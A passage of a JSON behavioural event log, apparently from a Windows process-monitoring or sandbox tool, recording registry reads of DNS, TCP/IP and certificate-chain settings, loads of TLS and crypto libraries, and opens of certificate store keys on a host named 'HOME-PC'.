        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 315,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistration",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 316,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistrationOnly",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 317,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\NewDhcpSrvRegistration",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 318,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessPreferLocal",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 319,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableIdnEncoding",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 320,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableIdnMapping",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 321,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ShortnameProxyDefault",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 322,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableNRPTForAdapterRegistration",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 323,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutHistoryLength",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 324,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutRecalculationInterval",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 325,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQueryTimeouts",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 326,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQueryTimeouts",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 327,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQuickQueryTimeouts",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 328,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQuickQueryTimeouts",
          "content": null
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 329,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 330,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 331,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname",
          "content": "HOME-PC"
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 332,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 333,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Domain",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 334,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Domain",
          "content": ""
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 335,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 336,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,047",
        "eid": 337,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname",
          "content": "HOME-PC"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,172",
        "eid": 338,
        "data": {
          "file": "C:\\Windows\\System32\\FWPUCLNT.DLL",
          "pathtofile": null,
          "moduleaddress": "0x7ffed8cb0000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,172",
        "eid": 339,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,172",
        "eid": 340,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,172",
        "eid": 341,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,172",
        "eid": 342,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,172",
        "eid": 343,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,187",
        "eid": 344,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,187",
        "eid": 345,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,219",
        "eid": 346,
        "data": {
          "file": "C:\\Windows\\System32\\schannel.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffedfaa0000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,219",
        "eid": 347,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,219",
        "eid": 348,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\SecurityProviders\\Schannel"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,219",
        "eid": 349,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextLockCount",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,219",
        "eid": 350,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextListCount",
          "content": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,344",
        "eid": 351,
        "data": {
          "file": "sspicli.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee0a40000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,344",
        "eid": 352,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,344",
        "eid": 353,
        "data": {
          "file": "mskeyprotect.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffecb060000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,344",
        "eid": 354,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,344",
        "eid": 355,
        "data": {
          "file": "C:\\Windows\\System32\\ncryptsslp.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffecb1a0000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,344",
        "eid": 356,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,344",
        "eid": 357,
        "data": {
          "file": "C:\\Windows\\System32\\bcryptprimitives.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee1390000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,344",
        "eid": 358,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 359,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7\\Name",
          "content": "@%SystemRoot%\\System32\\ci.dll,-100"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 360,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 361,
        "data": {
          "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-100",
          "content": "Isolated User Mode (IUM)"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 362,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7\\Name",
          "content": "@%SystemRoot%\\System32\\ci.dll,-100"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 363,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 364,
        "data": {
          "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-100",
          "content": "Isolated User Mode (IUM)"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 365,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7\\Name",
          "content": "@%SystemRoot%\\System32\\ci.dll,-101"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 366,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 367,
        "data": {
          "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-101",
          "content": "Enclave"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 368,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7\\Name",
          "content": "@%SystemRoot%\\System32\\ci.dll,-101"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 369,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 370,
        "data": {
          "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-101",
          "content": "Enclave"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 371,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name",
          "content": "@%SystemRoot%\\system32\\dnsapi.dll,-103"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 372,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 373,
        "data": {
          "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\dnsapi.dll,-103",
          "content": "\\x414\\x43e\\x432\\x435\\x440\\x435\\x43d\\x43d\\x44b\\x439 DNS-\\x441\\x435\\x440\\x432\\x435\\x440"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 374,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name",
          "content": "@%SystemRoot%\\system32\\dnsapi.dll,-103"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 375,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 376,
        "data": {
          "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\dnsapi.dll,-103",
          "content": "\\x414\\x43e\\x432\\x435\\x440\\x435\\x43d\\x43d\\x44b\\x439 DNS-\\x441\\x435\\x440\\x432\\x435\\x440"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 377,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7\\Name",
          "content": "@%SystemRoot%\\System32\\wuaueng.dll,-400"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 378,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 379,
        "data": {
          "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\wuaueng.dll,-400",
          "content": "\\x426\\x435\\x43d\\x442\\x440 \\x43e\\x431\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 380,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7\\Name",
          "content": "@%SystemRoot%\\System32\\wuaueng.dll,-400"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,359",
        "eid": 381,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 382,
        "data": {
          "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\wuaueng.dll,-400",
          "content": "\\x426\\x435\\x43d\\x442\\x440 \\x43e\\x431\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 383,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7\\Name",
          "content": "@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 384,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 385,
        "data": {
          "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124",
          "content": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x434\\x43e\\x43a\\x443\\x43c\\x435\\x43d\\x442\\x43e\\x432"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 386,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7\\Name",
          "content": "@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 387,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 388,
        "data": {
          "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124",
          "content": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x434\\x43e\\x43a\\x443\\x43c\\x435\\x43d\\x442\\x43e\\x432"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 389,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7\\Name",
          "content": "@%SystemRoot%\\system32\\NgcRecovery.dll,-100"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 390,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 391,
        "data": {
          "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\NgcRecovery.dll,-100",
          "content": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x43a\\x43b\\x44e\\x447\\x430 \\x432\\x43e\\x441\\x441\\x442\\x430\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows Hello"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 392,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7\\Name",
          "content": "@%SystemRoot%\\system32\\NgcRecovery.dll,-100"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 393,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 394,
        "data": {
          "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\NgcRecovery.dll,-100",
          "content": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x43a\\x43b\\x44e\\x447\\x430 \\x432\\x43e\\x441\\x441\\x442\\x430\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows Hello"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 395,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagLevel",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 396,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagMatchAnyMask",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 397,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableSerialChain",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 398,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\CryptnetPreFetchTriggerPeriodSeconds",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 399,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxUrlRetrievalByteCount",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,375",
        "eid": 400,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertSyncDeltaTime",
          "content": null
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 401,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root"
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 402,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root"
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 403,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot"
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 404,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root"
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 405,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root"
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 406,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\SmartCardRoot"
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 407,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA"
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 408,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA"
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 409,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA"
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 410,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 411,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlags",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 412,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableAutoFlushProcessNameList",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 413,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushFirstDeltaSeconds",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 414,
        "data": {
